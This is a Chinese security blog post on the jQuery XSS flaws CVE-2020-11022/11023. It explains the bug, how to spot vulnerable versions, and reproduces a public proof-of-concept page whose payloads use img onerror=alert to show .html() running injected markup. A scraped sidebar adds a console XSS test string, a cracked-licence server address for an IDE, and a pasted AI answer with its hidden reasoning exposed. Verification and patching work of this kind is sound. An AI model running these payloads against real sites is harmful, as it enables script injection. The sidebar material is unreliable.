jQuery导致的XSS跨站漏洞

最新推荐文章于 2025-09-28 16:41:42 发布
原创 最新推荐文章于 2025-09-28 16:41:42 发布 · 6.1k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #安全 #前端

本文介绍 JQuery 中存在的 DOM-based XSS 漏洞,包括漏洞原理、发现方法及验证过程。通过 JavaScript POC 示例展示了如何触发漏洞,提醒开发者注意版本更新。

漏洞详情:

在JQuery的诸多发行版本中,存在着DOM-based XSS(跨站脚本攻击的一种)漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞。

漏洞发现:

最简单方式,通过火狐浏览器的retire.js插件,访问目标网站发现。

或者通过扫描器,找到JQuery版本信息

漏洞验证:

漏洞发现者提供了JavaScript XSS Demo POC,使用POC验证漏洞情况

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="http://xxxxxxxxxxxxxx/js/common/jquery-2.1.3.min.js"></script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(2)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert("1st")>">
</xmp>

<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert("1st")></style>
</xmp>

<div id="div"></div>
</body>
</html>

点击POC1下的Append via .html,xss弹窗

F12查看源代码发现div下<style>标签被闭合,执行<img>中onerror的弹窗

其他就不做演示,可自行查看。

 

 

LZ_KaiHuang
关注
低版本jQuery导致XSS Nuclei FUZZ POC
afei001
02-15 1320
我记得以前用那些漏扫工具时时常会报一个低版本jQuery安全问题,当时还不会验证。直到有一天,它托梦给我。我悟了。低版本jQuery导致XSS POC文件文末获取。
JQuery跨站脚本漏洞
热门推荐
谢公子的博客
05-04 3万+
原理: jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本: jquery-1.7.1~1.8.3 jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js jquery-1.5所有版本 jquery-1.4所有版本 ...
jQuery XSS漏洞原因查找及解决方案
Galadridel的博客
06-11 2万+
测试网站是否存在此XSS跨站漏洞: 以google浏览器为例,打开要测试的网站,在Console窗口输入: $("element[attribute='<img src=123123 onerror=alert(123)>'"); 回车之后会出现弹窗,说明存在XSS跨站漏洞 解决方案:升级jquery版本1.10.2以上 升级之后如果还未修复,可能是其他的js包引起的,jqu...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
XSS跨站脚本攻击)详解【场景、影响、检测、防护】
最新发布
NeoLshu的博客
09-28 1456
本文全面解析了XSS跨站脚本攻击)的原理、分类、示例及防护策略。XSS攻击通过注入恶意脚本,利用浏览器信任执行窃取凭证、篡改页面等操作。分为反射型、存储型和DOM型三种类型,攻击后果严重,可导致会话劫持、数据泄露等风险。文章提供了易受攻击的代码示例及修复方案,强调根据不同输出上下文进行编码(如HTML、JavaScript转义),并推荐使用白名单过滤和安全的DOM操作API(如textContent)。检测方法包括手工测试、黑盒扫描和代码审计。防护核心在于输入验证、输出编码和严格的内容安全策略(CSP)。
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
一纸荒芜的博客
10-31 3万+
jquery-xss漏洞复现
2024年最全webstorm的安装及基本配置,2024最新物联网嵌入式开发高频精选面试题分享
2401_85015025的博客
05-14 710
择“License server”,然后在输入框中输入 License server address 为:http://hb5.s.osidea.cc:1017(有可能不能用,自己可以百度搜一下最新的)点击”Activate”按钮。人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**各种配置 可以根据自己的需求自行配置。7、开始基本配置 主要在。
Jquery XSS漏洞(CVE-2020-11022)
jammny
02-04 2万+
漏洞详情 jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞分析 在html()方
【免费下载】 深入解析jQuery-XSS漏洞安全防护与技术应用
gitblog_06578的博客
09-20 2278
深入解析jQuery-XSS漏洞安全防护与技术应用 【下载地址】jQuery-XSS漏洞CVE-2020-11022CVE-2020-11023资源文件介绍 本资源文件提供了关于jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)的详细信息和验证代码。该漏洞存在于大于或等于1.2且在3...
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
然而,谷歌的安全工程师Eduardo Vela在jQuery Mobile中发现了一个安全隐患,可能导致跨站脚本(XSS)攻击。这种攻击允许恶意用户在受害者的浏览器中执行代码,从而可能窃取用户数据、操纵页面内容或执行其他恶意操作...
漏洞笔记】jQuery跨站脚本
TeamsSix 的 优快云 空间
11-20 2424
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 5100
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
jquery xss验证代码
08-13
jquery xss验证代码,以txt打开,修改http://xxx/jquery.js,保存后加载有问题的jquery,可以出现弹窗
怎么用jquery发现因为jquery版本过低引发的XSS跨站安全漏洞
06-08
jQuery中,由于早期版本的安全措施可能不完善,可能会存在一些历史漏洞,比如XSS跨站脚本攻击)风险。XSS漏洞通常是通过恶意注入脚本来获取用户的敏感信息或执行非授权操作。如果你怀疑遇到了由旧版本jQuery引起...
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
jQuery-XSS漏洞(CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
2401_85013983的博客
05-14 1561
【代码】jQuery-XSS漏洞(CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现。
jQuery跨站脚本漏洞
weixin_50464560的博客
08-21 2525
原理:     jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min...
jQuery最新xss漏洞浅析、复现、修复
m0_59598029的博客
03-20 1782
形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。危害:一旦注入恶意脚本后,攻击者就能够执行各种恶意活动。攻击者可能将私有信息(例如可能包含会话信息的 cookie)从受害者的机器传输给攻击者。攻击者可能以受害者的身份将恶意请求发送到Web 站点,如果受害者具有管理该站点的管理员特权,这可能对站点尤其危险。
JQuery-XSS漏洞利用
07-17
<think>首先,用户的问题是:“我想了解如何防范或分析jQuery相关的XSS漏洞 请问jQuery XSS 漏洞防范与分析方法”。这是关于jQueryXSS漏洞的防范和分析。 根据系统级指令: - 所有行内数学表达式使用$...$格式。 - 独立公式使用$$...$$格式并单独成段。 - LaTeX语法正确。 - 使用中文回答。 - 生成相关问题。 - 回答中引用的段落末尾自然地添加引用标识,例如[^1]。 用户可见层指令: - 回答结构清晰,帮助用户逐步解决问题。 - 尽量保证回答真实可靠。 参考的引用: - [^1]: 关于jQuery跨站脚本漏洞与防范方法。 - [^2]: XSS漏洞原理及防护。 - [^3]: xss攻击和防范。 - [^4]: XSS漏洞的测试与利用。 我需要基于这些引用构建回答。引用内容主要涉及XSS漏洞的原理、防范方法,以及jQuery相关的部分。 关键点从引用中提取: - [^1]: jQuery使用中需要关注安全性,特别是XSS漏洞的防范。 - [^2]: XSS漏洞利用如cookie欺骗、网站钓鱼等;解决思路是过滤+实体化编码。 - [^3]: 对输出进行转义再显示;防御措施包括编码、转义。 - [^4]: 测试XSS漏洞的例子,如输入<script>alert("66666")</script>;需要过滤用户提交的内容。 回答结构: - 逐步解决问题:先解释什么是jQuery相关的XSS漏洞,然后分析如何分析,最后防范方法。 - 结构清晰:分部分,如引言、分析部分、防范部分。 - 使用中文。 - 在末尾添加相关问题。 生成相关问题: - 系统指令要求“生成相关问题”,并放在回答末尾,像示例中那样。 - 示例中是“§§相关问题§§”后列出问题。 所以,我的回答结构: 1. 引言:简要介绍jQuery XSS漏洞。 2. 分析部分:如何分析jQuery相关的XSS漏洞。 3. 防范部分:如何防范。 4. 添加引用标识在引用段落末尾。 5. 最后,生成相关问题。 确保LaTeX:用户的问题没有数学内容,所以可能不需要数学表达式。但如果有数学相关,要用$...$或$$...$$。这里可能不涉及,但以防万一。 现在,构建回答内容。 **引言:** - 解释jQuery XSS漏洞jQuery是一个流行的JavaScript库,用于简化DOM操作。但它可能引入XSS漏洞,如果开发者不正确地处理用户输入。 - 引用[^1]:jQuery为开发者提供了强大工具,但需要关注安全性。 **分析部分:** - 如何分析:测试输入点,检查是否用户输入被直接插入到DOM中而不转义。 - 引用[^4]:输入<script>alert("66666")</script>测试;如果显示,则存在漏洞。 - 分析原理:XSS攻击通过注入恶意脚本,窃取信息或执行操作。 - 引用[^2]:XSS漏洞利用如cookie欺骗、获取管理权限。 **防范部分:** - 关键防范方法:过滤输入和转义输出。 - 引用[^2]:过滤+实体化编码。 - 引用[^3]:对输出进行转义再显示。 - jQuery特定:使用jQuery的方法如.text()代替.html()来避免执行脚本;使用安全函数。 添加引用标识: - 在相关句子末尾加[^1], [^2]等。 生成相关问题: - 类似示例,列出3-4个相关问题。 - 例如: 1. jQuery中哪些方法容易导致XSS漏洞? 2. 如何测试jQuery应用的XSS漏洞? 3. jQuery插件如何安全地处理用户输入? 4. XSS漏洞的常见攻击场景有哪些? 确保回答真实可靠:基于提供的引用和常识。引用是可靠的来源。 最终回答大纲: 1. **引言** - 介绍jQuery XSS漏洞。 2. **分析jQuery相关的XSS漏洞** - 解释如何识别和分析漏洞点。 3. **防范方法** - 列出具体防范措施。 4. **相关问题** - 列出相关问题。</think>### jQuery XSS漏洞防范与分析方法 jQuery是一个广泛使用的JavaScript库,它简化了DOM操作和事件处理,但如果不当使用,可能引入跨站脚本(XSS漏洞XSS攻击允许攻击者注入恶意脚本,窃取用户数据、cookie或控制用户会话[^2]。防范和分析jQuery相关的XSS漏洞需要结合输入验证、输出编码和框架安全实践。下面我将分步解释分析方法和防范措施,确保回答基于可靠的安全原则。 #### 1. **分析jQuery相关的XSS漏洞** 分析XSS漏洞的核心是识别用户输入点和输出点是否安全。以下是系统化的分析步骤: - **识别输入源**:检查所有用户可控制的输入点,如表单字段、URL参数或AJAX请求。在jQuery应用中,常见漏洞点包括`.html()`, `.append()`, 或`.innerHTML`等方法,这些方法可能直接执行未转义的HTML内容[^4]。例如,测试时输入`<script>alert("XSS测试")</script>`,如果弹出警告框,表明存在漏洞[^4]。 - **测试漏洞利用**:模拟攻击场景,如cookie欺骗或会话劫持。使用工具(如Burp Suite或OWASP ZAP)扫描应用,检查用户输入是否被直接插入到DOM中而不转义。引用[^2]指出,XSS漏洞导致攻击者获取管理员权限,威胁整个Web应用安全。 - **分析jQuery特定风险**:jQuery插件或第三方库可能引入额外风险。检查代码中是否使用不安全的方法,如`$.parseHTML()`或动态加载脚本,这些可能绕过浏览器安全机制[^1]。同时,审查事件处理(如`onclick`属性)是否允许注入脚本。 - **总结分析工具**:推荐使用: - 静态分析工具:ESLint或jQuery Lint插件,检测代码中的潜在XSS模式。 - 动态测试:手动测试输入边界值,或自动化工具如Selenium模拟用户交互。 分析后,生成报告列出高风险点,便于针对性修复[^3]。 #### 2. **防范jQuery相关的XSS漏洞** 防范XSS漏洞的关键是“过滤输入 + 编码输出”,结合jQuery最佳实践。以下是具体措施: - **输入过滤**:对所有用户输入进行严格验证和过滤。使用正则表达式或库(如DOMPurify)移除危险字符(如`<`, `>`, `&`)。例如: ```javascript // 示例:过滤用户输入 function sanitizeInput(input) { return input.replace(/[<>"&]/g, ""); // 移除危险字符 } ``` 引用[^2]强调,过滤是防御XSS的第一道防线,能防止恶意代码注入。 - **输出编码**:在输出到DOM前,对数据进行实体化编码。jQuery提供安全方法: - 使用`.text()`代替`.html()`来插入文本内容,避免执行脚本。 - 对于动态内容,采用`$.text()`或`document.createTextNode()`。 例如: ```javascript // 安全输出示例 $("#output").text(userInput); // 使用.text()编码输出 ``` 引用[^3]指出,输出转义能确保浏览器将输入视为纯文本而非可执行代码。 - **框架级防护**: - 启用Content Security Policy(CSP):通过HTTP头限制脚本来源,阻止内联脚本执行。例如,设置`Content-Security-Policy: script-src 'self'`。 - 使用jQuery安全插件:如jQuery XSS插件,自动处理编码。 - 避免直接使用`eval()`或`Function()`:这些函数可能执行恶意输入[^1]。 - **其他最佳实践**: - 定期更新jQuery版本:旧版本可能有已知漏洞,升级到最新版(如jQuery 3.x以上)以修复安全问题[^1]。 - 教育和代码审查:培训开发者使用安全编码规范,并在代码审查中重点检查输入/输出点。 引用[^4]显示,结合过滤和编码,能有效使恶意代码无法执行。 通过以上方法,您可以显著降低jQuery应用中的XSS风险。如果涉及复杂场景,建议咨询安全专家或使用渗透测试服务。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值